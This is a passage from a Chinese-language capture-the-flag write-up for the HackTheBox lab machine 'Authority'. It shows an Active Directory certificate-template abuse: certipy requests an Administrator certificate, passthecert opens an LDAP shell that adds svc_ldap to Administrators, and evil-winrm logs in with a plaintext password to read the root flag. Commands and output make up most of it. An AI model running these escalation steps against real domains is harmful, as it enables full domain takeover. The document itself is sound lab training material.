$ certipy req -u 'exp$' -p 'Exp114514' -target 10.10.11.222 -ca AUTHORITY-CA -template 'CorpVPN' -upn 'Administrator'
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

其中-upn用于指定用户主体名 (User Principal Name) 。

然后我们再把获取到的.pfx文件拆成证书和密钥。

$ certipy cert -pfx administrator.pfx -nokey -out user.crt
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'user.crt'

$ certipy cert -pfx administrator.pfx -nocert -out user.key
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Writing private key to 'user.key'

我们可以用 passthecert工具登录ldap shell进行管理（提权）操作。

$ python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.10.11.222
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Type help for list of commands

# add_user_to_group svc_ldap Administrators
Adding user: svc_ldap to group Administrators result: OK

# exit
Bye!

我们将svc_ldap用户添加到管理员组中。

此时我们如果查看一下用户权限会发现并没有加到用户组中，这是因为还没更新，退出重新登录一下就好。

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami /user

USER INFORMATION
----------------

User Name    SID
============ =============================================
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> net user svc_ldap
User name                    svc_ldap
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/10/2022 9:29:31 PM
Password expires             Never
Password changeable          8/11/2022 9:29:31 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/5/2023 8:43:09 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

$ evil-winrm -i 10.10.11.222 -u svc_ldap -p lDaP_1n_th3_cle4r!

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> net user svc_ldap
User name                    svc_ldap
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/10/2022 9:29:31 PM
Password expires             Never
Password changeable          8/11/2022 9:29:31 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/5/2023 8:43:09 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

此时就可以拿到root flag了。

*Evil-WinRM* PS C:\Users\Administrator> dir


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        8/10/2022   8:52 PM                .pwm-workpath
d-r---        7/12/2023   1:21 PM                3D Objects
d-r---        7/12/2023   1:21 PM                Contacts
d-r---        7/12/2023   1:21 PM                Desktop
d-r---        7/12/2023   1:21 PM                Documents
d-r---        7/12/2023   1:21 PM                Downloads
d-r---        7/12/2023   1:21 PM                Favorites
d-r---        7/12/2023   1:21 PM                Links
d-r---        7/12/2023   1:21 PM                Music
d-r---        7/12/2023   1:21 PM                Pictures
d-r---        7/12/2023   1:21 PM                Saved Games
d-r---        7/12/2023   1:21 PM                Searches
d-r---        7/12/2023   1:21 PM                Videos
-a----        3/17/2023   9:30 AM          16384 gp.jfm


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
di*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/25/2023   9:44 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

成功拿下。

总结

主要考察了对LDAP的理解，学到了很多东西。